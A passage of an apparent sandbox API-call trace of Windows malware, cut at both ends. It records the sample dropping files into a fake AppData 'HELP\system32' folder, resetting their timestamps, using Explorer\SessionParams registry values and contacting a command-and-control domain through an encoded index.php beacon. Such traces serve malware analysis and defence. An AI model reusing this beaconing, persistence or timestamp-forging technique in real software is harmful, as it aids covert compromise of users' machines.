lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.837] GetLastError () returned 0x0 [0066.837] SetLastError (dwErrCode=0x0) [0066.837] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetLastError () returned 0x0 [0066.838] SetLastError (dwErrCode=0x0) [0066.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.838] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dc78 | out: lpSystemTimeAsFileTime=0x172dc78*(dwLowDateTime=0xf53c4050, dwHighDateTime=0x1d3dfba)) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] GetLastError () returned 0x0 [0066.839] SetLastError (dwErrCode=0x0) [0066.839] Sleep (dwMilliseconds=0x1) [0066.847] Sleep (dwMilliseconds=0x1) [0066.879] Sleep (dwMilliseconds=0x1) [0066.916] Sleep (dwMilliseconds=0x1) [0066.927] Sleep (dwMilliseconds=0x1) [0066.940] Sleep (dwMilliseconds=0x1) [0066.955] Sleep (dwMilliseconds=0x1) [0066.971] Sleep (dwMilliseconds=0x1) [0066.988] Sleep (dwMilliseconds=0x1) [0067.003] Sleep (dwMilliseconds=0x1) [0067.018] Sleep (dwMilliseconds=0x1) [0067.033] Sleep (dwMilliseconds=0x1) [0067.049] Sleep (dwMilliseconds=0x1) [0067.065] Sleep (dwMilliseconds=0x1) [0067.081] Sleep (dwMilliseconds=0x1) [0067.096] Sleep (dwMilliseconds=0x1) [0067.112] Sleep (dwMilliseconds=0x1) [0067.127] Sleep (dwMilliseconds=0x1) [0067.143] Sleep (dwMilliseconds=0x1) [0067.159] Sleep (dwMilliseconds=0x1) [0067.174] Sleep (dwMilliseconds=0x1) [0067.189] Sleep (dwMilliseconds=0x1) [0067.205] Sleep (dwMilliseconds=0x1) [0067.220] Sleep (dwMilliseconds=0x1) [0067.238] Sleep (dwMilliseconds=0x1) [0067.252] Sleep (dwMilliseconds=0x1) [0067.268] Sleep (dwMilliseconds=0x1) [0067.283] Sleep (dwMilliseconds=0x1) [0067.299] Sleep (dwMilliseconds=0x1) [0067.314] Sleep (dwMilliseconds=0x1) [0067.330] Sleep (dwMilliseconds=0x1) [0067.345] Sleep (dwMilliseconds=0x1) [0067.361] Sleep (dwMilliseconds=0x1) [0067.377] Sleep (dwMilliseconds=0x1) [0067.392] Sleep (dwMilliseconds=0x1) [0067.408] Sleep (dwMilliseconds=0x1) [0067.423] Sleep (dwMilliseconds=0x1) [0067.439] Sleep (dwMilliseconds=0x1) [0067.455] Sleep (dwMilliseconds=0x1) [0067.470] Sleep (dwMilliseconds=0x1) [0067.486] Sleep (dwMilliseconds=0x1) [0067.502] Sleep (dwMilliseconds=0x1) [0067.517] Sleep (dwMilliseconds=0x1) [0067.533] Sleep (dwMilliseconds=0x1) [0067.548] Sleep (dwMilliseconds=0x1) [0067.572] Sleep (dwMilliseconds=0x1) [0067.580] Sleep (dwMilliseconds=0x1) [0067.596] Sleep (dwMilliseconds=0x1) [0067.611] Sleep (dwMilliseconds=0x1) [0067.629] Sleep (dwMilliseconds=0x1) [0067.642] Sleep (dwMilliseconds=0x1) [0067.659] Sleep (dwMilliseconds=0x1) [0067.682] Sleep (dwMilliseconds=0x1) [0067.694] Sleep (dwMilliseconds=0x1) [0067.707] Sleep (dwMilliseconds=0x1) [0067.720] Sleep (dwMilliseconds=0x1) [0067.736] Sleep (dwMilliseconds=0x1) [0067.751] Sleep (dwMilliseconds=0x1) [0067.767] Sleep (dwMilliseconds=0x1) [0067.782] Sleep (dwMilliseconds=0x1) [0067.800] Sleep (dwMilliseconds=0x1) [0067.814] Sleep (dwMilliseconds=0x1) [0067.829] Sleep (dwMilliseconds=0x1) [0067.845] Sleep (dwMilliseconds=0x1) [0067.860] Sleep (dwMilliseconds=0x1) [0067.876] Sleep (dwMilliseconds=0x1) [0067.891] Sleep (dwMilliseconds=0x1) [0067.907] Sleep (dwMilliseconds=0x1) [0067.923] Sleep (dwMilliseconds=0x1) [0067.938] Sleep (dwMilliseconds=0x1) [0067.954] Sleep (dwMilliseconds=0x1) [0067.969] Sleep (dwMilliseconds=0x1) [0067.985] Sleep (dwMilliseconds=0x1) [0068.000] Sleep (dwMilliseconds=0x1) [0068.018] Sleep (dwMilliseconds=0x1) [0068.032] Sleep (dwMilliseconds=0x1) [0068.048] Sleep (dwMilliseconds=0x1) [0068.063] Sleep (dwMilliseconds=0x1) [0068.079] Sleep (dwMilliseconds=0x1) [0068.094] Sleep (dwMilliseconds=0x1) [0068.110] Sleep (dwMilliseconds=0x1) [0068.125] Sleep (dwMilliseconds=0x1) [0068.141] Sleep (dwMilliseconds=0x1) [0068.156] Sleep (dwMilliseconds=0x1) [0068.172] Sleep (dwMilliseconds=0x1) [0068.188] Sleep (dwMilliseconds=0x1) [0068.203] Sleep (dwMilliseconds=0x1) [0068.219] Sleep (dwMilliseconds=0x1) [0068.234] Sleep (dwMilliseconds=0x1) [0068.250] Sleep (dwMilliseconds=0x1) [0068.266] Sleep (dwMilliseconds=0x1) [0068.281] Sleep (dwMilliseconds=0x1) [0068.297] Sleep (dwMilliseconds=0x1) [0068.312] Sleep (dwMilliseconds=0x1) [0068.328] Sleep (dwMilliseconds=0x1) [0068.344] Sleep (dwMilliseconds=0x1) [0068.359] Sleep (dwMilliseconds=0x1) [0068.376] Sleep (dwMilliseconds=0x1) [0068.391] Sleep (dwMilliseconds=0x1) [0068.409] Sleep (dwMilliseconds=0x1) [0068.422] Sleep (dwMilliseconds=0x1) [0068.438] Sleep (dwMilliseconds=0x1) [0068.452] Sleep (dwMilliseconds=0x1) [0068.468] DeleteFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\olestdmp.ocx")) returned 0 [0068.468] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0068.468] wsprintfA (in: param_1=0x172e838, param_2="%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp") returned 67 [0068.468] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0068.469] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.469] WriteFile (in: hFile=0x158, lpBuffer=0x304260*, nNumberOfBytesToWrite=0xfa4, lpNumberOfBytesWritten=0x172e570, lpOverlapped=0x0 | out: lpBuffer=0x304260*, lpNumberOfBytesWritten=0x172e570*=0xfa4, lpOverlapped=0x0) returned 1 [0068.469] CloseHandle (hObject=0x158) returned 1 [0068.470] GetLocalTime (in: lpSystemTime=0x172e7b4 | out: lpSystemTime=0x172e7b4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0x1d, wHour=0xb, wMinute=0x7, wSecond=0x1, wMilliseconds=0x99)) [0068.470] GetLastError () returned 0xb7 [0068.470] SetLastError (dwErrCode=0xb7) [0068.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x158, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0068.470] RegQueryValueExA (in: hKey=0x158, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x5c) returned 0x0 [0068.470] RegQueryValueExA (in: hKey=0x158, lpValueName="Plpv", lpReserved=0x0, lpType=0x0, lpData=0x302d30, lpcbData=0x172e544*=0x5c | out: lpType=0x0, lpData=0x302d30*=0x9a, lpcbData=0x172e544*=0x5c) returned 0x0 [0068.470] RegCloseKey (hKey=0x158) returned 0x0 [0068.471] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x158, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0068.471] RegQueryValueExA (in: hKey=0x158, lpValueName="Pdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0xff, lpcbData=0x172e548*=0x4) returned 0x2 [0068.471] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x144, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0068.471] RegQueryValueExA (in: hKey=0x144, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0xff, lpcbData=0x172e540*=0x4) returned 0x2 [0068.471] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.471] GetFileType (hFile=0x160) returned 0x1 [0068.471] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xf63630b0, dwHighDateTime=0x1d3dfba)) [0068.471] GetLastError () returned 0xb7 [0068.471] SetLastError (dwErrCode=0xb7) [0068.471] GetLastError () returned 0xb7 [0068.471] SetLastError (dwErrCode=0xb7) [0068.471] GetLastError () returned 0xb7 [0068.471] SetLastError (dwErrCode=0xb7) [0068.471] CloseHandle (hObject=0x160) returned 1 [0068.472] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.472] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0068.472] CloseHandle (hObject=0x160) returned 1 [0068.472] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e514 | out: phkResult=0x72f1ed90*=0x160, lpdwDisposition=0x172e514*=0x2) returned 0x0 [0068.472] RegSetValueExA (in: hKey=0x160, lpValueName="Pdx", Reserved=0x0, dwType=0x4, lpData=0x172e548*=0x0, cbData=0x4 | out: lpData=0x172e548*=0x0) returned 0x0 [0068.472] RegCloseKey (hKey=0x160) returned 0x0 [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.472] GetLastError () returned 0x0 [0068.472] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] GetLastError () returned 0x0 [0068.473] SetLastError (dwErrCode=0x0) [0068.473] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.473] GetFileType (hFile=0x160) returned 0x1 [0068.473] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0xf63630b0, dwHighDateTime=0x1d3dfba)) [0068.473] GetLastError () returned 0xb7 [0068.474] SetLastError (dwErrCode=0xb7) [0068.474] GetLastError () returned 0xb7 [0068.474] SetLastError (dwErrCode=0xb7) [0068.474] GetLastError () returned 0xb7 [0068.474] SetLastError (dwErrCode=0xb7) [0068.474] CloseHandle (hObject=0x160) returned 1 [0068.474] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.474] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0068.474] CloseHandle (hObject=0x160) returned 1 [0068.474] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.474] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa4 [0068.474] CreateFileMappingA (hFile=0x160, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x15c [0068.474] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2c0000 [0068.475] WaitForSingleObject (hHandle=0x11c, dwMilliseconds=0xea60) returned 0x0 [0068.475] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0068.476] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x14c [0068.476] SetNamedPipeHandleState (hNamedPipe=0x140, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0068.476] GetTickCount () returned 0x1fee7 [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] GetLastError () returned 0x0 [0068.476] SetLastError (dwErrCode=0x0) [0068.476] UnmapViewOfFile (lpBaseAddress=0x2c0000) returned 1 [0068.477] CloseHandle (hObject=0x15c) returned 1 [0068.477] CloseHandle (hObject=0x160) returned 1 [0068.477] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.477] GetFileType (hFile=0x160) returned 0x1 [0068.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0xf63630b0, dwHighDateTime=0x1d3dfba)) [0068.477] GetLastError () returned 0xb7 [0068.477] SetLastError (dwErrCode=0xb7) [0068.477] GetLastError () returned 0xb7 [0068.477] SetLastError (dwErrCode=0xb7) [0068.477] GetLastError () returned 0xb7 [0068.477] SetLastError (dwErrCode=0xb7) [0068.477] CloseHandle (hObject=0x160) returned 1 [0068.477] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0068.477] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0068.477] CloseHandle (hObject=0x160) returned 1 [0068.477] strlen (_Str="easport-news.publicvm.com") returned 0x19 [0068.477] strlen (_Str="index/index.php?h=LIFUEDEFV6c%3d&d=LoFR84obwKcsgFshBzNmkhSzYScBNmeTHLFUEDEFV6csgVQQMQVmkRqwYSgDMGCXH7FgIAFBZpYdtWQhAzxnkwLrJHcRJXeHDKF0MBEld4cMoXQwESV3h8%3d%3d") returned 0x9f [0068.477] strlen (_Str="166158257030400D1114012904.jpg") returned 0x1e [0068.478] WriteFile (in: hFile=0x140, lpBuffer=0x1fd0048*, nNumberOfBytesToWrite=0x10a5, lpNumberOfBytesWritten=0x172e4f4, lpOverlapped=0x311230 | out: lpBuffer=0x1fd0048*, lpNumberOfBytesWritten=0x172e4f4*=0x10a5, lpOverlapped=0x311230) returned 1 [0068.480] ReadFile (in: hFile=0x140, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0x134, lpOverlapped=0x311230) returned 1 [0070.201] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x7a120) returned 0x0 [0070.201] GetOverlappedResult (in: hFile=0x140, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0070.201] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.202] GetFileType (hFile=0x160) returned 0x1 [0070.202] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xf73e6950, dwHighDateTime=0x1d3dfba)) [0070.202] GetLastError () returned 0xb7 [0070.202] SetLastError (dwErrCode=0xb7) [0070.202] GetLastError () returned 0xb7 [0070.202] SetLastError (dwErrCode=0xb7) [0070.202] GetLastError () returned 0xb7 [0070.202] SetLastError (dwErrCode=0xb7) [0070.203] CloseHandle (hObject=0x160) returned 1 [0070.203] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.203] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0070.203] CloseHandle (hObject=0x160) returned 1 [0070.203] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.203] GetFileType (hFile=0x160) returned 0x1 [0070.203] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xf73e6950, dwHighDateTime=0x1d3dfba)) [0070.203] GetLastError () returned 0xb7 [0070.203] SetLastError (dwErrCode=0xb7) [0070.203] GetLastError () returned 0xb7 [0070.203] SetLastError (dwErrCode=0xb7) [0070.204] GetLastError () returned 0xb7 [0070.204] SetLastError (dwErrCode=0xb7) [0070.204] CloseHandle (hObject=0x160) returned 1 [0070.204] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.204] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0070.204] CloseHandle (hObject=0x160) returned 1 [0070.204] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, 